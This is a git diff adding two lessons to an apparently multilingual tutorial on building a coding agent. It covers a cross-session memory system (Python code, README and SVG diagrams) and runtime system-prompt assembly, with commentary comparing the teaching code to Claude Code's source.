CONSOLIDATE_THRESHOLD: + return # 太少,不值得整理 + + prompt = ( + "Consolidate the following memories. Rules:\n" + "1. Merge duplicates into one concise memory\n" + "2. Remove outdated/contradicted memories\n" + "3. Keep the total under 50 memories\n" + "4. Preserve important user preferences above all\n\n" + f"{json.dumps(memories, indent=2)}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=2000, + ) + consolidated = json.loads(response.content[0].text.strip()) + # 清空旧记忆,写入合并后的 + for f in MEMORY_DIR.glob("mem_*.json"): + f.unlink() + for mem in consolidated: + mid = f"mem_{int(time.time())}_{abs(hash(mem.get('content', ''))) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +--- + +## 相对 s08 的变更 + +| 组件 | 之前 (s08) | 之后 (s09) | +|------|-----------|-----------| +| 记忆能力 | 无(压缩后偏好随摘要退化) | Loading + Extraction + Consolidation 三子系统 | +| 新函数 | — | load_memories, extract_memories, consolidate_memories, read_all_memory_files | +| 存储 | — | .memory/mem_*.json 跨会话持久化 | +| 工具 | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | bash, read_file, write_file (3) — 专注记忆演示 | +| 循环 | 每轮只做压缩 | 每轮注入相关记忆 + autoCompact 后提取新记忆 + 定期整理 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s09_memory/code.py +``` + +试试这些 prompt(分多轮输入,观察记忆的累积和加载): + +1. `I prefer using tabs for indentation, not spaces. Remember that.` +2. `Create a Python file called test.py`(观察 Agent 是否用了 tab) +3. `What did I tell you about my preferences?`(观察 Agent 是否记得) +4. `I also prefer single quotes over double quotes for strings.` + +观察重点:多轮对话后 `.memory/` 目录下是否生成了记忆文件?新一轮对话时 Agent 是否自动加载了之前的记忆? + +--- + +## 接下来 + +现在记忆有了、工具有了、压缩有了。但 system prompt 还是硬编码的一大段字符串——"你是一个 coding agent,你的工具是 bash、read、write..."。 + +如果给 Agent 加了一个新工具,system prompt 里要手动加一段描述。换了一个项目,整个 system prompt 要重写。prompt 应该是**运行时组装的**,像乐高——不同场景拼不同的积木。 + +s10 System Prompt → 分段 + 运行时组装。不同项目、不同用户、不同工具——拼出不同的 prompt。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `extractMemories.ts`(615 行)、`sessionMemory.ts`(495 行)、`memoryTypes.ts`、`findRelevantMemories.ts`、`autoDream/` 的完整分析。 + +### 一、MemorySelector:是用 LLM 选,不是 embedding + +教学版说"CC 用 embedding 向量相似度"——**这是错的**。CC 实际是用 **Sonnet 本身来选**(`findRelevantMemories.ts`): + +1. 把所有记忆文件的 `name` + `description`(从 YAML frontmatter 提取)列成清单 +2. 把清单发给 Sonnet:"根据名称和描述,选出真正有用的记忆(最多 5 个)。不确定就不要选。" +3. Sonnet 返回 `{ selected_memories: ["file1.md", ...] }` +4. 选中文件的完整内容被读取(最多 200 行 / 4096 字节每文件),注入到上下文 + +这意味着记忆选择本身就是一次 LLM 调用——但用的是轻量级 Sonnet side-query,不阻塞主流程。 + +### 二、ExtractMemories:在 stop hook 中触发,每轮都跑 + +触发时机(`stopHooks.ts:141-152`): +- 在 `handleStopHooks()` 中——模型停止、没有 tool_use 时 +- **不是** autoCompact 之后(教学版简化了这一点) +- 每 N 轮跑一次(默认 N=1,即每轮都跑) +- 有重叠保护:如果主 Agent 已经写入了记忆文件,跳过 + +### 三、记忆文件格式:Markdown + YAML frontmatter,不是 JSON + +教学版用 JSON 存储记忆。CC 实际用 **Markdown 文件 + YAML frontmatter**(`memoryTypes.ts:261-271`): + +```markdown +--- +name: user_preference_tabs +description: User prefers tabs for indentation +type: user +--- + +User prefers using tabs, not spaces, for indentation in all projects. +**Why:** Consistency with existing codebase conventions. +**How to apply:** Always use tabs when writing or editing Python files. +``` + +四种类型:`user`(用户偏好)、`feedback`(反馈指导)、`project`(项目事实)、`reference`(外部参考)。 + +记忆索引文件 `MEMORY.md` 是一行一个链接:`- [Title](file.md) — one-line hook`。最多 200 行 / 25KB。 + +存储位置:`~/.claude/projects//memory/` + +### 四、DreamConsolidator:三层门控 + +不是"空闲时触发",而是三层门控(`autoDream.ts`): + +1. **时间门禁**(最便宜):距上次合并 ≥ 24 小时 +2. **会话门禁**:自上次合并以来修改了 ≥ 5 个会话 transcript +3. **锁门禁**:没有其他进程正在做合并(`.consolidate-lock` 文件) + +合并算法本身是**又一个 forked agent 调用**——四阶段 prompt:定位 → 收集近期信号 → 合并写文件 → 剪枝更新索引。锁文件 mtime 就是 lastConsolidatedAt。崩溃恢复:1 小时后锁自动过期,下一个进程回收。 + +### 五、Session Memory vs User Memory + +| | User Memory | Session Memory | +|---|---|---| +| 持久性 | 跨会话 | 单会话 | +| 存储 | `memory/` 下多个 .md 文件 | `session-memory//memory.md` 单文件 | +| 加载到 | system prompt | compact 摘要 | +| 用途 | 跨会话的知识积累 | 跨 compact 的上下文连续性 | + +sessionMemoryCompact(s08 中提过的机制)正是使用了 Session Memory——autoCompact 前先读 session memory 文件,如果有足够内容(≥ 10K token、≥ 5 条文本消息、≤ 40K token),就用它做摘要,不调 LLM。 + +### 教学版的简化是刻意的 + +- LLM 选记忆 → 关键词匹配:教学版不能依赖额外的 Sonnet side-query +- 记忆 JSON → Markdown frontmatter:教学版用 JSON 更简单 +- stop hook 触发 → autoCompact 后触发:概念更连贯("压缩后顺便提取记忆") +- 三层门控 → 简单的计数判断:教学版没有 transcript 系统和多会话概念 + +
+ + diff --git a/s09_memory/code.py b/s09_memory/code.py new file mode 100644 index 000000000..dda7f76d3 --- /dev/null +++ b/s09_memory/code.py @@ -0,0 +1,296 @@ +#!/usr/bin/env python3 +""" +s09_memory.py - Memory System + +Three subsystems for persistent, cross-session knowledge: + + Loading: filter relevant memories → inject into context (every turn) + Extraction: discover preferences/constraints from dialogue (after compact) + Consolidation: merge duplicates, prune stale memories (periodic) + + ┌──────────────────────────────────────────────────────────────────┐ + │ .memory/ (persistent, survives compact and session restart) │ + │ mem_*.json ←── Extraction writes ──→ Consolidation merges │ + │ ↑ │ + │ Loading reads (keyword filter, max 5 items, ≤2000 token) │ + └──────────────────────────────────────────────────────────────────┘ + + In agent_loop: + system = SYSTEM + load_memories(messages) # every turn + ... + compact_history(messages) + extract_memories(messages) # after compact + consolidate_memories() # if ≥ 10 files + +Builds on s08 (context compact). Usage: + + python s09_memory/code.py + Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json, time +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +MEMORY_DIR = WORKDIR / ".memory"; MEMORY_DIR.mkdir(exist_ok=True) +SKILLS_DIR = WORKDIR / "skills" +TRANSCRIPT_DIR = WORKDIR / ".transcripts" +TOOL_RESULTS_DIR = WORKDIR / ".task_outputs" / "tool-results" +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Relevant memories are injected below. Respect user preferences from memory." + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s08 (unchanged): Basic tools +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(cmd: str) -> str: + try: + r = subprocess.run(cmd, shell=True, cwd=WORKDIR, capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path); file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content); return f"Wrote {len(content)} bytes to {path}" + except Exception as e: return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s09: Memory System — Loading + Extraction +# ═══════════════════════════════════════════════════════════ + +def extract_keywords(text: str) -> list[str]: + return [w.lower() for w in text.split() if len(w) > 3] + +def extract_recent_user_messages(messages: list, n: int = 3) -> str: + texts = [] + for msg in reversed(messages): + if msg.get("role") == "user" and isinstance(msg.get("content"), str): + texts.append(msg["content"]) + if len(texts) >= n: break + return " ".join(reversed(texts)) + +def read_all_memory_files() -> list[dict]: + memories = [] + for f in sorted(MEMORY_DIR.glob("mem_*.json")): + try: memories.append(json.loads(f.read_text())) + except Exception: pass + return memories + +# Loading: filter relevant memories each turn +def load_memories(messages: list, max_items: int = 5) -> str: + memories = read_all_memory_files() + if not memories: return "" + recent = extract_recent_user_messages(messages) + keywords = extract_keywords(recent) + relevant = [] + for mem in memories: + if any(kw in mem.get("content", "").lower() for kw in keywords): + relevant.append(mem) + if len(relevant) >= max_items: break + if not relevant: return "" + lines = [""] + for m in relevant: lines.append(f"- [{m.get('type', 'general')}] {m['content']}") + lines.append("") + return "\n".join(lines) + +# Extraction: discover new memories from dialogue (writes files directly) +def extract_memories(messages: list): + dialogue = "" + for msg in messages[-10:]: + role = msg.get("role", "?") + content = msg.get("content", "") + if isinstance(content, list): + content = " ".join(str(getattr(b, "text", "")) for b in content if getattr(b, "type", None) == "text") + dialogue += f"{role}: {content}\n" + prompt = ("Extract user preferences, constraints, or decisions from this dialogue.\n" + "Return a JSON array. Each item: {content, type: preference|constraint|decision}.\n" + "If nothing new, return [].\n\n" + dialogue[:4000]) + try: + response = client.messages.create(model=MODEL, messages=[{"role": "user", "content": prompt}], max_tokens=500) + text = response.content[0].text.strip() + if text.startswith("["): + for mem in json.loads(text): + mid = f"mem_{int(time.time())}_{abs(hash(mem['content'])) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) + print(f"\n\033[33m[Memory: extracted {len(json.loads(text))} new memories]\033[0m") + except Exception: pass + +# Consolidation: merge duplicates, prune stale memories (triggered when ≥ 10 files) +CONSOLIDATE_THRESHOLD = 10 + +def consolidate_memories(): + memories = read_all_memory_files() + if len(memories) < CONSOLIDATE_THRESHOLD: + return + prompt = ("Consolidate the following memories. Rules:\n" + "1. Merge duplicates into one concise memory\n" + "2. Remove outdated/contradicted memories\n" + "3. Keep the total under 50 memories\n" + "4. Preserve important user preferences above all\n\n" + f"{json.dumps(memories, indent=2)}") + try: + response = client.messages.create( + model=MODEL, messages=[{"role": "user", "content": prompt}], max_tokens=2000) + consolidated = json.loads(response.content[0].text.strip()) + # Clear old memories, write consolidated + for f in MEMORY_DIR.glob("mem_*.json"): + f.unlink() + for mem in consolidated: + mid = f"mem_{int(time.time())}_{abs(hash(mem.get('content', ''))) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) + print(f"\n\033[33m[Memory: consolidated {len(memories)} → {len(consolidated)} memories]\033[0m") + except Exception: pass + + +# ═══════════════════════════════════════════════════════════ +# FROM s08 (unchanged): Compaction pipeline + tool definitions +# ═══════════════════════════════════════════════════════════ + +CONTEXT_LIMIT = 50000; KEEP_RECENT = 3; PERSIST_THRESHOLD = 30000 + +def estimate_size(msgs): return len(str(msgs)) +def snip_compact(msgs, mx=50): + if len(msgs) <= mx: return msgs + return msgs[:3] + [{"role": "user", "content": f"[snipped {len(msgs)-mx} msgs]"}] + msgs[-(mx-3):] +def collect_tool_results(msgs): + blocks = [] + for mi, msg in enumerate(msgs): + if msg.get("role") != "user" or not isinstance(msg.get("content"), list): continue + for bi, block in enumerate(msg["content"]): + if isinstance(block, dict) and block.get("type") == "tool_result": blocks.append((mi, bi, block)) + return blocks +def micro_compact(msgs): + tr = collect_tool_results(msgs) + if len(tr) <= KEEP_RECENT: return msgs + for _, _, b in tr[:-KEEP_RECENT]: + if len(b.get("content", "")) > 120: b["content"] = "[Earlier tool result compacted.]" + return msgs +def persist_large(tid, out): + if len(out) <= PERSIST_THRESHOLD: return out + TOOL_RESULTS_DIR.mkdir(parents=True, exist_ok=True) + p = TOOL_RESULTS_DIR / f"{tid}.txt" + if not p.exists(): p.write_text(out) + return f"\nFull: {p}\nPreview:\n{out[:2000]}\n" +def tool_result_budget(msgs, mx=200_000): + last = msgs[-1] if msgs else None + if not last or last.get("role") != "user" or not isinstance(last.get("content"), list): return msgs + blocks = [(i, b) for i, b in enumerate(last["content"]) if isinstance(b, dict) and b.get("type") == "tool_result"] + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + if total <= mx: return msgs + for _, block in sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True): + if total <= mx: break + c = str(block.get("content", "")) + if len(c) <= PERSIST_THRESHOLD: continue + block["content"] = persist_large(block.get("tool_use_id", "?"), c) + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + return msgs +def write_transcript(msgs): + TRANSCRIPT_DIR.mkdir(parents=True, exist_ok=True) + p = TRANSCRIPT_DIR / f"transcript_{int(time.time())}.jsonl" + with p.open("w") as f: + for m in msgs: f.write(json.dumps(m, default=str) + "\n") + return p +def summarize_history(msgs): + conv = json.dumps(msgs, default=str)[:80000] + r = client.messages.create(model=MODEL, messages=[{"role": "user", "content": "Summarize:\n" + conv}], max_tokens=2000) + return r.content[0].text.strip() +def compact_history(msgs): + write_transcript(msgs); summary = summarize_history(msgs) + return [{"role": "user", "content": f"[Compacted]\n\n{summary}"}] +def reactive_compact(msgs): + write_transcript(msgs); summary = summarize_history(msgs) + return [{"role": "user", "content": f"[Reactive compact]\n\n{summary}"}, *msgs[-5:]] + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", "input_schema": {"type": "object", "properties": {"path": {"type": "string"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content.", "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, +] +TOOL_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write} + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — s09 change: inject memories + extract after compact +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + round_count = 0 + while True: + # s09 change: inject relevant memories every turn + memories_text = load_memories(messages) + system = SYSTEM + "\n\n" + memories_text if memories_text else SYSTEM + + messages[:] = snip_compact(messages) + messages[:] = micro_compact(messages) + messages[:] = tool_result_budget(messages) + + if estimate_size(messages) > CONTEXT_LIMIT: + print("[auto compact]") + messages[:] = compact_history(messages) + # s09 change: extract memories after compact, consolidate periodically + extract_memories(messages) + consolidate_memories() + + try: + response = client.messages.create(model=MODEL, system=system, messages=messages, tools=TOOLS, max_tokens=8000) + except Exception as e: + if "prompt_too_long" in str(e).lower(): messages[:] = reactive_compact(messages); continue + raise + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": return + + results = [] + for block in response.content: + if block.type != "tool_use": continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + round_count += 1 + + +if __name__ == "__main__": + print("s09: Memory") + print("输入问题,回车发送。输入 q 退出。\n") + history = [] + while True: + try: query = input("\033[36ms09 >> \033[0m") + except (EOFError, KeyboardInterrupt): break + if query.strip().lower() in ("q", "exit", ""): break + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": print(block.text) + print() diff --git a/s09_memory/images/memory-overview.en.svg b/s09_memory/images/memory-overview.en.svg new file mode 100644 index 000000000..04801d313 --- /dev/null +++ b/s09_memory/images/memory-overview.en.svg @@ -0,0 +1,104 @@ + + + + + + + + + + + + + + + + + + + + + + Memory — memory loading & extraction inserted on top of s08 compaction + + + + s08 preserved + + s09 new + + + + messages[] + + + + + + + Compaction Pipeline + snip → micro → budget + → autoCompact + (s08) + + + + + + + Loading + Filter relevant memories + Inject into context + ≤ 2000 token + + + + + + + LLM + + + + No + + Return result + + + + Yes + + + + TOOL_HANDLERS + bash · read · write + task · skill · ... + + + + Memory Files (.memory/) — Cross-session persistence + + + + Read + + + + Extraction + Write + + + Consolidation: periodic dedup·merge·prune (background) + + + + Tool results appended to messages[] → next turn → compress → load memories → LLM + + + + + s08 preserved: compaction pipeline (L1-L4) + emergency trimming + loop + + s09 new: Loading (inject memories each turn) + Extraction (extract after compact) + Consolidation (periodic) + Three subsystems by trigger timing: each turn → after compact → periodic + diff --git a/s09_memory/images/memory-overview.ja.svg b/s09_memory/images/memory-overview.ja.svg new file mode 100644 index 000000000..9aa34b139 --- /dev/null +++ b/s09_memory/images/memory-overview.ja.svg @@ -0,0 +1,104 @@ + + + + + + + + + + + + + + + + + + + + + + Memory — s08 圧縮パイプラインにメモリの読み込みと抽出を挿入 + + + + s08 維持 + + s09 新規 + + + + messages[] + + + + + + + 圧縮パイプライン + snip → micro → budget + → autoCompact + (s08) + + + + + + + Loading + 関連メモリをフィルタ + コンテキストに注入 + ≤ 2000 token + + + + + + + LLM + + + + No + + 結果を返す + + + + Yes + + + + TOOL_HANDLERS + bash · read · write + task · skill · ... + + + + メモリファイル (.memory/) — クロスセッション永続化 + + + + 読み取り + + + + Extraction + 書き込み + + + Consolidation: 定期的に重複排除・統合・整理(バックグラウンド) + + + + ツール結果を messages[] に追加 → 次のターン → 圧縮 → メモリ読み込み → LLM + + + + + s08 維持:圧縮パイプライン(L1-L4)+ 緊急トリミング + ループ + + s09 新規:Loading(各ターンでメモリ注入)+ Extraction(compact 後に抽出)+ Consolidation(定期的に統合) + 3つのサブシステム連携:各ターン → compact 後 → 定期的 + diff --git a/s09_memory/images/memory-overview.svg b/s09_memory/images/memory-overview.svg new file mode 100644 index 000000000..7c3f3134b --- /dev/null +++ b/s09_memory/images/memory-overview.svg @@ -0,0 +1,104 @@ + + + + + + + + + + + + + + + + + + + + + + Memory — 在 s08 压缩管线上,插入记忆加载与提取 + + + + s08 保留 + + s09 新增 + + + + messages[] + + + + + + + 压缩管线 + snip → micro → budget + → autoCompact + (s08) + + + + + + + Loading + 筛选相关记忆 + 注入上下文 + ≤ 2000 token + + + + + + + LLM + + + + + + 返回结果 + + + + + + + + TOOL_HANDLERS + bash · read · write + task · skill · ... + + + + Memory Files (.memory/) — 跨会话持久化 + + + + 读取 + + + + Extraction + 写入 + + + Consolidation: 定期去重·合并·淘汰(后台运行) + + + + 工具结果追加到 messages[] → 下一轮 → 压缩 → 加载记忆 → LLM + + + + + s08 保留:压缩管线(L1-L4)+ 应急裁剪 + 循环 + + s09 新增:Loading(每轮注入记忆)+ Extraction(compact 后提取)+ Consolidation(定期整理) + 三个子系统按触发时机:每轮 → compact 后 → 定期 + diff --git a/s09_memory/images/memory-subsystems.en.svg b/s09_memory/images/memory-subsystems.en.svg new file mode 100644 index 000000000..0f38f68b0 --- /dev/null +++ b/s09_memory/images/memory-subsystems.en.svg @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + Memory System — Three Subsystems Working Together + + + + Loading + + Trigger: before each LLM call + Filter: keywords / embedding + Inject: system prompt tail + Only relevant, not all + + + + + + Extraction + + Trigger: after autoCompact + or keyword detected + LLM analyzes dialogue → JSON + Auto-discover preferences + + + + + + Consolidation + + Trigger: periodic / idle + Dedup · merge · prune + Keep ≤ 50 entries + "Dream" — like sleep memory consolidation + + + + Memory Files (.memory/mem_*.json) — Cross-session persistence + + + + Read + + + + Write + + + + Overwrite + + + + CC Source Code Comparison + • MemorySelector: embedding vector similarity filtering, not keyword matching + • ExtractMemories: triggered in stop hook, not after autoCompact + • DreamConsolidator: background thread, frequency by time + memory count + diff --git a/s09_memory/images/memory-subsystems.ja.svg b/s09_memory/images/memory-subsystems.ja.svg new file mode 100644 index 000000000..d560cdce4 --- /dev/null +++ b/s09_memory/images/memory-subsystems.ja.svg @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + Memory System — 3つのサブシステム連携 + + + + Loading + + トリガー:各ターン LLM 呼び出し前 + フィルタ:キーワード / embedding + 注入:system prompt 末尾 + 関連するものだけ、全部ではない + + + + + + Extraction + + トリガー:autoCompact 後 + またはキーワード検出時 + LLM が対話を分析 → JSON + 好みを自動発見 + + + + + + Consolidation + + トリガー:定期 / アイドル時 + 重複排除 · 統合 · 整理 + ≤ 50 件を維持 + "Dream" — 睡眠中の記憶整理に例えて + + + + メモリファイル (.memory/mem_*.json) — クロスセッション永続化 + + + + 読み取り + + + + 書き込み + + + + 上書き + + + + CC ソースコード比較 + ・MemorySelector:embedding ベクトル類似度でフィルタ、キーワードマッチングではない + ・ExtractMemories:stop hook でトリガー、autoCompact 後ではない + ・DreamConsolidator:バックグラウンドスレッド、頻度は時間 + メモリ数で決定 + diff --git a/s09_memory/images/memory-subsystems.svg b/s09_memory/images/memory-subsystems.svg new file mode 100644 index 000000000..a05d0de5f --- /dev/null +++ b/s09_memory/images/memory-subsystems.svg @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + Memory System — 三个子系统协作 + + + + Loading(加载) + + 触发:每轮 LLM 调用前 + 筛选:关键词 / embedding + 注入:system prompt 尾部 + 只带相关的,不带全部的 + + + + + + Extraction(提取) + + 触发:autoCompact 后 + 或检测到关键词 + LLM 分析对话 → JSON + 自动发现偏好、约束、决策 + + + + + + Consolidation(巩固) + + 触发:定期/空闲时 + 去重·合并·淘汰 + 保持 ≤50 条 + "Dream"(梦境)— 借喻睡眠时整理记忆 + + + + Memory Files (.memory/mem_*.json) — 跨会话持久化 + + + + 读取 + + + + 写入 + + + + 覆写 + + + + CC 源码对照 + • MemorySelector:embedding 向量相似度筛选,非关键词匹配 + • ExtractMemories:在 stop hook 中触发,非 autoCompact 后 + • DreamConsolidator:后台线程,运行频率由时间 + 记忆数量决定 + diff --git a/s10_system_prompt/README.en.md b/s10_system_prompt/README.en.md new file mode 100644 index 000000000..c971b10c2 --- /dev/null +++ b/s10_system_prompt/README.en.md @@ -0,0 +1,235 @@ +# s10: System Prompt — Assembled at Runtime, Never Hardcoded + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s08 → s09 → `s10` → [s11](../s11_error_recovery/) → s12 → ... → s19 + +> *"A prompt is assembled, not hard-coded"* — Sections + on-demand assembly. +> +> **Harness Layer**: Prompt — Assembled at Runtime, Never Hardcoded. + +--- + +## The Problem + +From s01 through s09, the system prompt was a single hard-coded string: + +```python +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks." +``` + +That sufficed for s01 — only bash, read, and write. But by s09, the agent has memory, compression, and skill loading. The prompt needs to describe more capabilities: + +```python +SYSTEM = ( + f"You are a coding agent at {WORKDIR}. " + "Use tools to solve tasks. Act, don't explain. " + "Before starting any multi-step task, use todo_write. " + "Skills are available via list_skills and load_skill. " + "Relevant memories are injected below when available. " + # ... every new capability adds another paragraph +) +``` + +Three problems: + +1. **Changing projects requires rewriting the entire prompt** — switching from Python to React, you don't know what to change and what to keep +2. **Modifying one part can affect the whole** — adding a tool description may conflict with earlier instructions +3. **Every request carries all content** — even when the current conversation doesn't use skill loading, that description wastes tokens + +**A prompt should be like Lego — different scenarios assemble different blocks, not a single slab of concrete.** + +--- + +## The Solution + +![System Prompt Overview](images/system-prompt-overview.en.svg) + +s09's loop, compression, and memory are all preserved. The only change: split the hard-coded `SYSTEM` into independent sections, assemble them at runtime based on context, and cache the result to avoid redundant assembly. + +Six sections, three loading strategies: + +| Section | Loading Strategy | Content | +|---------|-----------------|---------| +| identity | Always | Who you are, how to work | +| tools | Always | Available tool list | +| workspace | Always | Working directory, environment info | +| planning | On-demand | Planning instructions for multi-step tasks | +| skills | On-demand | Loaded when skills are available | +| memory | On-demand | Injected when relevant memories exist | + +--- + +## How It Works + +### PROMPT_SECTIONS: Section Definitions + +Split one long string into a dictionary, where each key is a theme: + +```python +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob...", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "memory": "Relevant memories are injected below when available.", +} +``` + +Each section is maintained independently — modifying `tools` doesn't affect `identity`; adding `memory` doesn't touch `planning`. + +### assemble_system_prompt: On-Demand Assembly + +With the dictionary in place, not every section is needed every time. If the current conversation has no multi-step task, loading `planning` just wastes tokens. Use `context` to decide what to load: + +```python +def assemble_system_prompt(context: dict) -> str: + """Assemble system prompt based on current context.""" + sections = [] + + # Always loaded + sections.append(PROMPT_SECTIONS["identity"]) + sections.append(PROMPT_SECTIONS["tools"]) + sections.append(PROMPT_SECTIONS["workspace"]) + + # On-demand + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + + return "\n\n".join(sections) +``` + +"Always loaded" sections are needed every turn — identity, tools, working directory. "On-demand" sections are only useful under specific conditions. + +Why not load everything? **Tokens cost money** (system prompt is billed every turn), and **less information keeps the LLM more focused** (irrelevant instructions are noise). + +### get_system_prompt: Cache to Avoid Redundant Assembly + +When the context hasn't changed (multiple LLM calls within the same conversation turn, same context), re-assembling is wasteful. Use a hash to detect changes — cache hit returns immediately: + +```python +_last_context_hash = None +_last_prompt = None + +def get_system_prompt(context: dict) -> str: + """Get system prompt with caching.""" + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash = h + _last_prompt = assemble_system_prompt(context) + return _last_prompt +``` + +Cache precondition: only re-assemble when `context` changes. CC also has prompt cache at the API level — static parts use global cache, dynamic parts use org cache — the tutorial uses a hash for simplicity. + +### Putting It Together + +```python +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + # ... tool execution ... + context = update_context(context, messages) + system = get_system_prompt(context) +``` + +At the start of each loop iteration, fetch the system prompt once. If context changed, re-assemble; otherwise return cached result. + +--- + +## Changes from s09 + +| Component | Before (s09) | After (s10) | +|-----------|-------------|-------------| +| prompt | Hard-coded SYSTEM string | PROMPT_SECTIONS + assemble_system_prompt | +| cache | None | get_system_prompt (hash detection + cache) | +| new functions | — | assemble_system_prompt, get_system_prompt | +| tools | bash, read_file, write_file (3) | bash, read_file, write_file (3) — unchanged | +| loop | Uses fixed SYSTEM | Uses get_system_prompt(context) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s10_system_prompt/code.py +``` + +What to observe: + +1. Which sections are loaded in the output (`[assembled] sections: ...` label) +2. During continuous conversation, whether the prompt re-assembles when context changes +3. On cache hits, whether `[cache hit]` is shown, skipping re-assembly + +--- + +## What's Next + +The system prompt is assembled, memory is in place, compression is in place. The agent seems capable of handling anything — until an LLM call fails. + +Network jitter, API rate limiting, truncated output, context overflow — these aren't bugs, they're the norm. The agent can't crash at the first error. + +s11 Error Recovery → Four recovery paths. Upgrade tokens, compress context, exponential backoff, switch models. An error isn't the end — it's the start of a retry. + +
+Deep Dive into CC Source + +> The following is a complete analysis based on CC source code `prompts.ts` (914 lines), `systemPromptSections.ts` (68 lines), `context.ts` (189 lines). + +### 1. Not a Few Paragraphs — 21 Sections + +The tutorial uses a simple dictionary for prompt fragments. CC's system prompt consists of 21 sections, split into static and dynamic layers: + +**Static (cacheable across organizations)**: identity, system, doing_tasks, actions, using_tools, tone_style, output_efficiency — these are always loaded. + +**Dynamic (resolved through registry)**: session_guidance, memory, env_info, language, output_style, mcp_instructions, scratchpad, frc, summarize_tool_results, token_budget — these are loaded per cache policy. + +`mcp_instructions` is the only **volatile** section (`cacheBreak: true`) — because MCP servers can connect and disconnect between turns. + +### 2. Assembly Function Signature + +```typescript +getSystemPrompt(tools, model, additionalWorkingDirs?, mcpClients?): Promise +``` + +Returns `string[]` (each element is a section), separated by `SYSTEM_PROMPT_DYNAMIC_BOUNDARY` between static and dynamic parts. This separator also determines the Anthropic API's `cache_scope` — before boundary: `global`, after boundary: `org`. + +### 3. Three-Layer Cache + +1. **lodash memoize**: `getSystemContext` and `getUserContext` cached for the entire session (`context.ts:36,116,155`) +2. **Registry cache**: `STATE.systemPromptSectionCache` (`bootstrap/state.ts:203`) caches dynamic section results. Cleared on `/clear` or `/compact` +3. **API-level cache**: `splitSysPromptPrefix()` (`api.ts:321`) splits the prompt into chunks with different `cache_scope` — static parts use global cache, dynamic parts use org cache + +### 4. getUserContext vs getSystemContext + +| | getSystemContext | getUserContext | +|---|---|---| +| Content | gitStatus, cacheBreaker | CLAUDE.md contents, currentDate | +| Injection | **Appended** to system prompt array | **Prepended** as `` user message | +| When skipped | Custom system prompt | Always runs | + +### 5. How Modes Change the Prompt + +- **CLAUDE_CODE_SIMPLE**: Entire prompt is just 2 lines +- **Proactive/KAIROS**: Replaces all standard sections with a compact prompt +- **Coordinator**: Fully replaced with coordinator-specific prompt +- **Agent mode**: Agent-defined prompt replaces or appends to the default prompt + +### 6. Total Size + +Standard interactive mode system prompt is approximately 20-30KB of text. CLAUDE_CODE_SIMPLE is about 150 characters. User context 